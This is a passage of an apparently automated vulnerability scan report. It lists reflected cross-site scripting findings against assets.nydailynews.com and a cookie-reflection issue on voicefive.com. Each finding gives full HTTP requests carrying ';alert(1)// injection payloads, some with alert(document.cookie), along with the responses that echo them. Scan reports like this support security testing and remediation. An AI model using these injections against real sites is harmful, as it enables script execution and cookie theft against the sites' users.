Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=5&initExp=Wed Jan 26 20:14:29 2011&recExp=Thu Jan 27 13:24:45 2011&prad=58087454&arc=40401349&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 16:37:21 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 16:37:21 2011&prad=5808748125b4d%3Cscript%3Ealert%281%29%3C%2Fscript%3E955dc17c970&arc=40401349&; expires=Thu 28-Apr-2011 16:37:21 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296232641; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26380

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"5808748125b4d<script>alert(1)</script>955dc17c970",Pid:"p85001580",Arc:"40401349",Location:COMSCORE.BMX.Broker.Location,Title:COMSCORE.BMX.Broker.Title,Referrer:COMSCORE.BMX.Broker.Referrer,Grp:COMSCORE.BMX.Broker.getGrp("40401349"),Exp:COMSCORE.BMX.
...[SNIP]...

4.160. http://assets.nydailynews.com/css/20090601/nydn_homepage.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/css/20090601/nydn_homepage.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1a8f'%3balert(1)//59512309c7e was submitted in the REST URL parameter 1. This input was echoed as b1a8f';alert(1)//59512309c7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:38:07 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Cache-Control: private
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/cssb1a8f';alert(1)//59512309c7e/20090601/nydn_homepage.css';
}

//-->
...[SNIP]...

4.161. http://assets.nydailynews.com/css/20090601/nydn_homepage.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/css/20090601/nydn_homepage.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d939b'%3balert(1)//dd97d6f8afc was submitted in the REST URL parameter 2. This input was echoed as d939b';alert(1)//dd97d6f8afc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /css/20090601d939b'%3balert(1)//dd97d6f8afc/nydn_homepage.css HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:38:15 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Cache-Control: private
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/css/20090601d939b';alert(1)//dd97d6f8afc/nydn_homepage.css';
}

//-->
...[SNIP]...

4.162. http://assets.nydailynews.com/css/20090601/nydn_homepage.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/css/20090601/nydn_homepage.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc63e'%3balert(1)//b971dbab287 was submitted in the REST URL parameter 3. This input was echoed as bc63e';alert(1)//b971dbab287 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /css/20090601/nydn_homepage.cssbc63e'%3balert(1)//b971dbab287 HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:38:45 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
kie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/css/20090601/nydn_homepage.cssbc63e';alert(1)//b971dbab287';
}

//-->
...[SNIP]...

4.163. http://assets.nydailynews.com/css/20101001/nydn_global.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/css/20101001/nydn_global.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5631c'%3balert(1)//e099aec72c8 was submitted in the REST URL parameter 1. This input was echoed as 5631c';alert(1)//e099aec72c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /css5631c'%3balert(1)//e099aec72c8/20101001/nydn_global.css HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:38:07 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Cache-Control: private
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/css5631c';alert(1)//e099aec72c8/20101001/nydn_global.css';
}

//-->
...[SNIP]...

4.164. http://assets.nydailynews.com/css/20101001/nydn_global.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/css/20101001/nydn_global.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38e81'%3balert(1)//ee1bc773075 was submitted in the REST URL parameter 2. This input was echoed as 38e81';alert(1)//ee1bc773075 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /css/2010100138e81'%3balert(1)//ee1bc773075/nydn_global.css HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:38:14 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Cache-Control: private
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/css/2010100138e81';alert(1)//ee1bc773075/nydn_global.css';
}

//-->
...[SNIP]...

4.165. http://assets.nydailynews.com/css/20101001/nydn_global.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/css/20101001/nydn_global.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b8a1'%3balert(1)//7f8a78c8a5 was submitted in the REST URL parameter 3. This input was echoed as 1b8a1';alert(1)//7f8a78c8a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /css/20101001/nydn_global.css1b8a1'%3balert(1)//7f8a78c8a5 HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:38:49 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
ookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/css/20101001/nydn_global.css1b8a1';alert(1)//7f8a78c8a5';
}

//-->
...[SNIP]...

4.166. http://assets.nydailynews.com/css/20101001/nydn_section.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/css/20101001/nydn_section.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18eee'%3balert(1)//eaae29adffe was submitted in the REST URL parameter 1. This input was echoed as 18eee';alert(1)//eaae29adffe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /css18eee'%3balert(1)//eaae29adffe/20101001/nydn_section.css HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:37:46 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Cache-Control: private
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/css18eee';alert(1)//eaae29adffe/20101001/nydn_section.css';
}

//-->
...[SNIP]...

4.167. http://assets.nydailynews.com/css/20101001/nydn_section.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/css/20101001/nydn_section.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce94e'%3balert(1)//a55edf17fd4 was submitted in the REST URL parameter 2. This input was echoed as ce94e';alert(1)//a55edf17fd4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /css/20101001ce94e'%3balert(1)//a55edf17fd4/nydn_section.css HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:38:16 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Cache-Control: private
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/css/20101001ce94e';alert(1)//a55edf17fd4/nydn_section.css';
}

//-->
...[SNIP]...

4.168. http://assets.nydailynews.com/css/20101001/nydn_section.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/css/20101001/nydn_section.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50562'%3balert(1)//8959375d35d was submitted in the REST URL parameter 3. This input was echoed as 50562';alert(1)//8959375d35d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /css/20101001/nydn_section.css50562'%3balert(1)//8959375d35d HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:39:54 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
okie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/css/20101001/nydn_section.css50562';alert(1)//8959375d35d';
}

//-->
...[SNIP]...

4.169. http://assets.nydailynews.com/css/20101001/nydn_wrapper.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/css/20101001/nydn_wrapper.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1212'%3balert(1)//7d7f91a6743 was submitted in the REST URL parameter 1. This input was echoed as e1212';alert(1)//7d7f91a6743 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /csse1212'%3balert(1)//7d7f91a6743/20101001/nydn_wrapper.css HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:38:50 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Cache-Control: private
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/csse1212';alert(1)//7d7f91a6743/20101001/nydn_wrapper.css';
}

//-->
...[SNIP]...

4.170. http://assets.nydailynews.com/css/20101001/nydn_wrapper.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/css/20101001/nydn_wrapper.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 451b8'%3balert(1)//09a243ac9e4 was submitted in the REST URL parameter 2. This input was echoed as 451b8';alert(1)//09a243ac9e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /css/20101001451b8'%3balert(1)//09a243ac9e4/nydn_wrapper.css HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:38:34 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Cache-Control: private
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/css/20101001451b8';alert(1)//09a243ac9e4/nydn_wrapper.css';
}

//-->
...[SNIP]...

4.171. http://assets.nydailynews.com/css/20101001/nydn_wrapper.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/css/20101001/nydn_wrapper.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74472'%3balert(1)//c53a03f00f was submitted in the REST URL parameter 3. This input was echoed as 74472';alert(1)//c53a03f00f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /css/20101001/nydn_wrapper.css74472'%3balert(1)//c53a03f00f HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:39:49 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
okie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/css/20101001/nydn_wrapper.css74472';alert(1)//c53a03f00f';
}

//-->
...[SNIP]...

4.172. http://assets.nydailynews.com/css/thickbox.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/css/thickbox.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45467'%3balert(1)//93ee1c912e9 was submitted in the REST URL parameter 1. This input was echoed as 45467';alert(1)//93ee1c912e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /css45467'%3balert(1)//93ee1c912e9/thickbox.css HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:38:07 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Cache-Control: private
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/css45467';alert(1)//93ee1c912e9/thickbox.css';
}

//-->
...[SNIP]...

4.173. http://assets.nydailynews.com/css/thickbox.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/css/thickbox.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84c91'%3balert(1)//d25f0f01566 was submitted in the REST URL parameter 2. This input was echoed as 84c91';alert(1)//d25f0f01566 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /css/thickbox.css84c91'%3balert(1)//d25f0f01566 HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:39:21 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/css/thickbox.css84c91';alert(1)//d25f0f01566';
}

//-->
...[SNIP]...

4.174. http://assets.nydailynews.com/js/nydn-pack-20101001.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/js/nydn-pack-20101001.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 685e9'%3balert(1)//22666baf37e was submitted in the REST URL parameter 1. This input was echoed as 685e9';alert(1)//22666baf37e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js685e9'%3balert(1)//22666baf37e/nydn-pack-20101001.js HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:37:45 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Cache-Control: private
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/js685e9';alert(1)//22666baf37e/nydn-pack-20101001.js';
}

//-->
...[SNIP]...

4.175. http://assets.nydailynews.com/js/nydn-pack-20101001.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/js/nydn-pack-20101001.js

Issue detail

